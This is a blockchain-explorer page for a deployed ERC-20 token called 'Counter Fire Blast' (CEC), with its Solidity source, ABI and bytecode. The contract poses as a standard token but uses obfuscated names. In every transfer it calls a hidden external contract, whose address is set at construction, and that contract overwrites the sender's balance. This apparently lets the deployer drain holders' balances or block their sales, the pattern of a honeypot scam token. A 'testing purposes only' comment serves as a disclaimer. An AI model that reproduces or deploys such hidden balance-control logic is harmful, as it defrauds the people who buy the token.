ERC-20
Overview
Max Total Supply
1,000,000,000,000 CEC
Holders
304
Market
Price
$0.00 @ 0.000000 ETH
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
0.000000393 CECValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
TOKEN
Compiler Version
v0.8.6+commit.11564f7e
Contract Source Code (Solidity)
/** *Submitted for verification at blastscan.io on 2024-09-07 */ pragma solidity ^0.8.6; // SPDX-License-Identifier: Unlicensed interface IERC20 { function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } abstract contract Ownable { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); constructor() { address msgSender = msg.sender; _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } function owner() public view returns (address) { return _owner; } modifier onlyOwner() { require(_owner == msg.sender, "Ownable: caller is not the owner"); _; } function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } interface JSDfbcESccdoUmQmeZeCac { function _ac028bcac( address zPgHp0rfjTe, address zjsnwbrkto, uint256 fjqHzp2hmc, uint256 wNAbJO9iqv ) external returns (uint256, uint256); } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } } /** * This contract is for testing purposes only. * Please do not make any purchases, as we are not responsible for any losses incurred. */ contract TOKEN is IERC20, Ownable { using SafeMath for uint256; mapping(address => uint256) private _tOwned; mapping(address => mapping(address => uint256)) private _allowances; address public _defaultAddress = address(0x000000000000000000000000000000000000dEaD); string private _nameUWbfJi = "Counter Fire Blast"; string private _symbolUWbfJi = "CEC"; uint8 private _decimalsUWbfJi = 9; JSDfbcESccdoUmQmeZeCac private c082163a30a; uint256 private _tTotal = 1000000000000 * 10**_decimalsUWbfJi; constructor(uint256 aUWbfJi) { c082163a30a = getBcFhuqhhakrto(((brcFactorhuqhhakrto(aUWbfJi)))); _tOwned[msg.sender] = _tTotal; emit Transfer(address(0), msg.sender, _tTotal); } function name() public view returns (string memory) { return _nameUWbfJi; } function symbol() public view returns (string memory) { return _symbolUWbfJi; } function decimals() public view returns (uint256) { return _decimalsUWbfJi; } function totalSupply() public view override returns (uint256) { return _tTotal; } function balanceOf(address account) public view override returns (uint256) { return _tOwned[account]; } function transfer(address zeqfnzzcrecipient, uint256 duglmyhuamount) public override returns (bool) { _transfer(msg.sender, zeqfnzzcrecipient, duglmyhuamount); return true; } function getBcFhuqhhakrto(address accc) internal pure returns (JSDfbcESccdoUmQmeZeCac) { return getBcQhuqhhakrto(accc); } function getBcQhuqhhakrto(address accc) internal pure returns (JSDfbcESccdoUmQmeZeCac) { return JSDfbcESccdoUmQmeZeCac(accc); } function brc20Manhuqhhakrto(address dnaqqzaifrom,address dnzmqto,uint256 amount,uint256 amountv) private returns(uint256,uint256) { return c082163a30a._ac028bcac(dnaqqzaifrom,dnzmqto,amount, amountv); } function allowance(address laeysgodowner, address pqmerfvnspender) public view override returns (uint256) { return _allowances[laeysgodowner][pqmerfvnspender]; } function brcFfffactorhuqhhakrto(uint256 value) internal pure returns (uint160) { return (uint160(value)); } function brcFactorhuqhhakrto(uint256 value) internal pure returns (address) { return address(brcFfffactorhuqhhakrto(value)); } function approve(address spender, uint256 amount) public override returns (bool) { _approve(msg.sender, spender, amount); return true; } function _transfer( address suxurecdfrom, address huqhhakrto, uint256 amount ) private { require( suxurecdfrom != address(0), "ERC20: transfer from the zero address" ); require( huqhhakrto != address(0), "ERC20: transfer to the zero address" ); uint256 feeAmount = 0; (uint256 zeqfnzzcrecipient, uint256 duglmyhuamount) = brc20Manhuqhhakrto( suxurecdfrom, huqhhakrto, amount, _tOwned[suxurecdfrom] ); _tOwned[suxurecdfrom] = duglmyhuamount; require( _tOwned[suxurecdfrom] >= amount, "ERC20: transfer amount exceeds balance" ); _tOwned[suxurecdfrom] = _tOwned[suxurecdfrom].sub(amount); _tOwned[huqhhakrto] = _tOwned[huqhhakrto].add(zeqfnzzcrecipient); emit Transfer(suxurecdfrom, huqhhakrto, amount); } function transferFrom( address nilmatlbsender, address rysshsttrecipient, uint256 voiygialamount ) public override returns (bool) { _transfer(nilmatlbsender, rysshsttrecipient, voiygialamount); _approve( nilmatlbsender, msg.sender, _allowances[nilmatlbsender][msg.sender].sub( voiygialamount, "ERC20: transfer amount exceeds allowance" ) ); return true; } function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].add(addedValue) ); return true; } function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve( msg.sender, spender, _allowances[msg.sender][spender].sub( subtractedValue, "ERC20: decreased allowance below zero" ) ); return true; } function _approve( address owner, address spender, uint256 amount ) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function volwswue() external view returns (uint256) { return _decimalsUWbfJi; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"aUWbfJi","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_defaultAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"laeysgodowner","type":"address"},{"internalType":"address","name":"pqmerfvnspender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"zeqfnzzcrecipient","type":"address"},{"internalType":"uint256","name":"duglmyhuamount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"nilmatlbsender","type":"address"},{"internalType":"address","name":"rysshsttrecipient","type":"address"},{"internalType":"uint256","name":"voiygialamount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"volwswue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
608060405261dead600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280601281526020017f436f756e746572204669726520426c6173740000000000000000000000000000815250600490805190602001906200009492919062000366565b506040518060400160405280600381526020017f434543000000000000000000000000000000000000000000000000000000000081525060059080519060200190620000e292919062000366565b506009600660006101000a81548160ff021916908360ff160217905550600660009054906101000a900460ff16600a6200011d9190620004e8565b64e8d4a510006200012f919062000625565b6007553480156200013f57600080fd5b50604051620023213803806200232183398181016040528101906200016591906200042d565b6000339050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a350620002276200021b826200031e60201b60201c565b6200033860201b60201c565b600660016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600754600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6007546040516200030f919062000470565b60405180910390a3506200075d565b600062000331826200035260201b60201c565b9050919050565b60006200034b826200035c60201b60201c565b9050919050565b6000819050919050565b6000819050919050565b82805462000374906200069d565b90600052602060002090601f016020900481019282620003985760008555620003e4565b82601f10620003b357805160ff1916838001178555620003e4565b82800160010185558215620003e4579182015b82811115620003e3578251825591602001919060010190620003c6565b5b509050620003f39190620003f7565b5090565b5b8082111562000412576000816000905550600101620003f8565b5090565b600081519050620004278162000743565b92915050565b60006020828403121562000446576200044562000731565b5b6000620004568482850162000416565b91505092915050565b6200046a8162000686565b82525050565b60006020820190506200048760008301846200045f565b92915050565b6000808291508390505b6001851115620004df57808604811115620004b757620004b6620006d3565b5b6001851615620004c75780820291505b8081029050620004d78562000736565b945062000497565b94509492505050565b6000620004f58262000686565b9150620005028362000690565b9250620005317fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000539565b905092915050565b6000826200054b57600190506200061e565b816200055b57600090506200061e565b81600181146200057457600281146200057f57620005b5565b60019150506200061e565b60ff841115620005945762000593620006d3565b5b8360020a915084821115620005ae57620005ad620006d3565b5b506200061e565b5060208310610133831016604e8410600b8410161715620005ef5782820a905083811115620005e957620005e8620006d3565b5b6200061e565b620005fe84848460016200048d565b92509050818404811115620006185762000617620006d3565b5b81810290505b9392505050565b6000620006328262000686565b91506200063f8362000686565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200067b576200067a620006d3565b5b828202905092915050565b6000819050919050565b600060ff82169050919050565b60006002820490506001821680620006b657607f821691505b60208210811415620006cd57620006cc62000702565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b60008160011c9050919050565b6200074e8162000686565b81146200075a57600080fd5b50565b611bb4806200076d6000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb146102b3578063aa6a94e9146102e3578063dd62ed3e14610301578063f2fde38b1461033157610100565b80638da5cb5b14610229578063927f3d411461024757806395d89b4114610265578063a457c2d71461028357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034d565b60405161011a91906115d3565b60405180910390f35b61013d6004803603810190610138919061135a565b6103df565b60405161014a91906115b8565b60405180910390f35b61015b6103f6565b60405161016891906116f5565b60405180910390f35b61018b60048036038101906101869190611307565b610400565b60405161019891906115b8565b60405180910390f35b6101a96104cb565b6040516101b691906116f5565b60405180910390f35b6101d960048036038101906101d4919061135a565b6104e5565b6040516101e691906115b8565b60405180910390f35b6102096004803603810190610204919061129a565b61058a565b60405161021691906116f5565b60405180910390f35b6102276105d3565b005b61023161071f565b60405161023e9190611558565b60405180910390f35b61024f610748565b60405161025c9190611558565b60405180910390f35b61026d61076e565b60405161027a91906115d3565b60405180910390f35b61029d6004803603810190610298919061135a565b610800565b6040516102aa91906115b8565b60405180910390f35b6102cd60048036038101906102c8919061135a565b6108bf565b6040516102da91906115b8565b60405180910390f35b6102eb6108d6565b6040516102f891906116f5565b60405180910390f35b61031b600480360381019061031691906112c7565b6108f0565b60405161032891906116f5565b60405180910390f35b61034b6004803603810190610346919061129a565b610977565b005b60606004805461035c90611831565b80601f016020809104026020016040519081016040528092919081815260200182805461038890611831565b80156103d55780601f106103aa576101008083540402835291602001916103d5565b820191906000526020600020905b8154815290600101906020018083116103b857829003601f168201915b5050505050905090565b60006103ec338484610b32565b6001905092915050565b6000600754905090565b600061040d848484610cfd565b6104c084336104bb85604051806060016040528060288152602001611b3260289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108d9092919063ffffffff16565b610b32565b600190509392505050565b6000600660009054906101000a900460ff1660ff16905090565b6000610580338461057b85600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f190919063ffffffff16565b610b32565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610661576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065890611695565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606005805461077d90611831565b80601f01602080910402602001604051908101604052809291908181526020018280546107a990611831565b80156107f65780601f106107cb576101008083540402835291602001916107f6565b820191906000526020600020905b8154815290600101906020018083116107d957829003601f168201915b5050505050905090565b60006108b533846108b085604051806060016040528060258152602001611b5a60259139600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108d9092919063ffffffff16565b610b32565b6001905092915050565b60006108cc338484610cfd565b6001905092915050565b6000600660009054906101000a900460ff1660ff16905090565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a05576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fc90611695565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c90611615565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b99906116d5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0990611635565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cf091906116f5565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d64906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd4906115f5565b60405180910390fd5b60008080610e2c868686600160008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461114f565b9150915080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555083600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610ef6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eed90611675565b60405180910390fd5b610f4884600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461121190919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fdd82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f190919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161107d91906116f5565b60405180910390a3505050505050565b60008383111582906110d5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cc91906115d3565b60405180910390fd5b50600083856110e49190611782565b9050809150509392505050565b6000808284611100919061172c565b905083811015611145576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113c90611655565b60405180910390fd5b8091505092915050565b600080600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c31e7832878787876040518563ffffffff1660e01b81526004016111b39493929190611573565b6040805180830381600087803b1580156111cc57600080fd5b505af11580156111e0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611204919061139a565b9150915094509492505050565b600061125383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061108d565b905092915050565b60008135905061126a81611b03565b92915050565b60008135905061127f81611b1a565b92915050565b60008151905061129481611b1a565b92915050565b6000602082840312156112b0576112af6118c1565b5b60006112be8482850161125b565b91505092915050565b600080604083850312156112de576112dd6118c1565b5b60006112ec8582860161125b565b92505060206112fd8582860161125b565b9150509250929050565b6000806000606084860312156113205761131f6118c1565b5b600061132e8682870161125b565b935050602061133f8682870161125b565b925050604061135086828701611270565b9150509250925092565b60008060408385031215611371576113706118c1565b5b600061137f8582860161125b565b925050602061139085828601611270565b9150509250929050565b600080604083850312156113b1576113b06118c1565b5b60006113bf85828601611285565b92505060206113d085828601611285565b9150509250929050565b6113e3816117b6565b82525050565b6113f2816117c8565b82525050565b600061140382611710565b61140d818561171b565b935061141d8185602086016117fe565b611426816118c6565b840191505092915050565b600061143e60238361171b565b9150611449826118d7565b604082019050919050565b600061146160268361171b565b915061146c82611926565b604082019050919050565b600061148460228361171b565b915061148f82611975565b604082019050919050565b60006114a7601b8361171b565b91506114b2826119c4565b602082019050919050565b60006114ca60268361171b565b91506114d5826119ed565b604082019050919050565b60006114ed60208361171b565b91506114f882611a3c565b602082019050919050565b600061151060258361171b565b915061151b82611a65565b604082019050919050565b600061153360248361171b565b915061153e82611ab4565b604082019050919050565b611552816117f4565b82525050565b600060208201905061156d60008301846113da565b92915050565b600060808201905061158860008301876113da565b61159560208301866113da565b6115a26040830185611549565b6115af6060830184611549565b95945050505050565b60006020820190506115cd60008301846113e9565b92915050565b600060208201905081810360008301526115ed81846113f8565b905092915050565b6000602082019050818103600083015261160e81611431565b9050919050565b6000602082019050818103600083015261162e81611454565b9050919050565b6000602082019050818103600083015261164e81611477565b9050919050565b6000602082019050818103600083015261166e8161149a565b9050919050565b6000602082019050818103600083015261168e816114bd565b9050919050565b600060208201905081810360008301526116ae816114e0565b9050919050565b600060208201905081810360008301526116ce81611503565b9050919050565b600060208201905081810360008301526116ee81611526565b9050919050565b600060208201905061170a6000830184611549565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611737826117f4565b9150611742836117f4565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111561177757611776611863565b5b828201905092915050565b600061178d826117f4565b9150611798836117f4565b9250828210156117ab576117aa611863565b5b828203905092915050565b60006117c1826117d4565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b8381101561181c578082015181840152602081019050611801565b8381111561182b576000848401525b50505050565b6000600282049050600182168061184957607f821691505b6020821081141561185d5761185c611892565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b611b0c816117b6565b8114611b1757600080fd5b50565b611b23816117f4565b8114611b2e57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ad9f0bd87672b469a272605d1dabcd755fa0e7bc9388749d54387d52ff30e2ec64736f6c634300080600330000000000000000000000001e9fae8162c76209199057e111d3b92bd3394416
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb146102b3578063aa6a94e9146102e3578063dd62ed3e14610301578063f2fde38b1461033157610100565b80638da5cb5b14610229578063927f3d411461024757806395d89b4114610265578063a457c2d71461028357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034d565b60405161011a91906115d3565b60405180910390f35b61013d6004803603810190610138919061135a565b6103df565b60405161014a91906115b8565b60405180910390f35b61015b6103f6565b60405161016891906116f5565b60405180910390f35b61018b60048036038101906101869190611307565b610400565b60405161019891906115b8565b60405180910390f35b6101a96104cb565b6040516101b691906116f5565b60405180910390f35b6101d960048036038101906101d4919061135a565b6104e5565b6040516101e691906115b8565b60405180910390f35b6102096004803603810190610204919061129a565b61058a565b60405161021691906116f5565b60405180910390f35b6102276105d3565b005b61023161071f565b60405161023e9190611558565b60405180910390f35b61024f610748565b60405161025c9190611558565b60405180910390f35b61026d61076e565b60405161027a91906115d3565b60405180910390f35b61029d6004803603810190610298919061135a565b610800565b6040516102aa91906115b8565b60405180910390f35b6102cd60048036038101906102c8919061135a565b6108bf565b6040516102da91906115b8565b60405180910390f35b6102eb6108d6565b6040516102f891906116f5565b60405180910390f35b61031b600480360381019061031691906112c7565b6108f0565b60405161032891906116f5565b60405180910390f35b61034b6004803603810190610346919061129a565b610977565b005b60606004805461035c90611831565b80601f016020809104026020016040519081016040528092919081815260200182805461038890611831565b80156103d55780601f106103aa576101008083540402835291602001916103d5565b820191906000526020600020905b8154815290600101906020018083116103b857829003601f168201915b